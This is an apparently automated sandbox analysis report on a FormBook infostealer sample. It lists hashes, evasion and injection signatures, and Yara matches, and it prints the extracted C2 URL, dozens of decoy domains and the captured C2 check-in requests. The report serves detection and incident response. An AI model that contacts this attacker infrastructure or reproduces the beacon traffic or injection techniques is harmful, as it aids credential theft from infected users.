Windows Analysis Report
primosdv3.1.1.0.exe

Overview

General Information

Sample Name: primosdv3.1.1.0.exe
Analysis ID: 715075
MD5: 633bb3ab12d6fd7b6956aa3a93f55e9c
SHA1: f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
SHA256: 0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Found hidden mapped module (file has been removed from disk)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
File is packed with WinRar
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: Yara match File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe ReversingLabs: Detection: 23%
Source: primosdv3.1.1.0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Joe Sandbox ML: detected
Source: 1.2.bstkiooen.exe.1010000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.3a2f840.4.unpack Avira: Label: TR/ATRAPS.Gen5
Source: 2.2.bstkiooen.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.bstkiooen.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.svchost.exe.60d900.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nordenergogrup.store/sk29/"], "decoy": ["invycons.com", "txirla.com", "skygrade.site", "mydubai.website", "giftr.online", "fotothink.com", "receitaspanelacaseira.online", "theroost.dev", "hy-allure.com", "homefilmcompany.online", "qest-mall.net", "palochkiotrollov.online", "aibset-terms.com", "clecrffp.work", "entel04.online", "conveyancercentralcoast.com", "evaij.info", "meitue.shop", "rothchild.top", "detecter-un-logiciel-espion.com", "pondokvaksin.net", "ethelh.club", "ky5653.com", "harriscountywageclaim.com", "ky9239.com", "medicierge.com", "hhro.us", "uuapple.tokyo", "lakeshoreguesthouse.com", "meiguoguo.top", "bennyrivera.photography", "mysittarausa.com", "suytrin.online", "sandstormcase.us", "amzn-2135.click", "galaxycrime.shop", "cabinetis.com", "rapidsketch.live", "nickhouston.com", "kinksandlocs.africa", "perinatolog.xyz", "soluofcr.com", "ethpow.domains", "cardinalchats.cloud", "macaront.info", "createorcollect.com", "csjkmcwl.work", "foxrightnow.site", "teazyy.com", "assafoetida-rife.biz", "surprisee.fun", "merkur-privatbanks-de.net", "wikipediathrive.com", "vijaysriniketan.tech", "nxaey.com", "shiershi.shop", "rthesieure.com", "deloxexchange.ltd", "dropmarketsystem.com", "49715.biz", "veganmetavers.xyz", "hty268.vip", "bfuiaccw.online", "beachsyndicate.info"]}
Source: primosdv3.1.1.0.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: primosdv3.1.1.0.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source: Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe Code function: 0_2_00C8B348 FindFirstFileExA, 0_2_00C8B348
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe Code function: 4x nop then pop edi 2_2_0040E471

Networking

Source: C:\Windows\explorer.exe Network Connect: 103.224.212.221 80
Source: C:\Windows\explorer.exe Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe Domain query: www.sandstormcase.us
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49708 -> 103.224.212.221:80
Source: Malware configuration extractor URLs: www.nordenergogrup.store/sk29/
Source: Joe Sandbox View ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: global traffic HTTP traffic detected:
  GET /sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD HTTP/1.1
  Host: www.nordenergogrup.store
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected:
  GET /sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD HTTP/1.1
  Host: www.sandstormcase.us
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View IP Address: 103.224.212.221
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx-reuseport/1.21.1
  Date: Mon, 03 Oct 2022 14:00:19 GMT
  Content-Type: text/html; charset=iso-8859-1
  Content-Length: 284
  Connection: close
  Vary: Accept-Encoding
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 31 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 6f 72 64 65 6e 65 72 67 6f 67 72 75 70 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.nordenergogrup.store Port 80</address></body></html>
Source: svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m
Source: explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown DNS traffic detected: queries for: www.nordenergogrup.store
Source: bstkiooen.exe, 00000001.00000002.380669907.000000000109A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

System Summary

Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: primosdv3.1.1.0.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
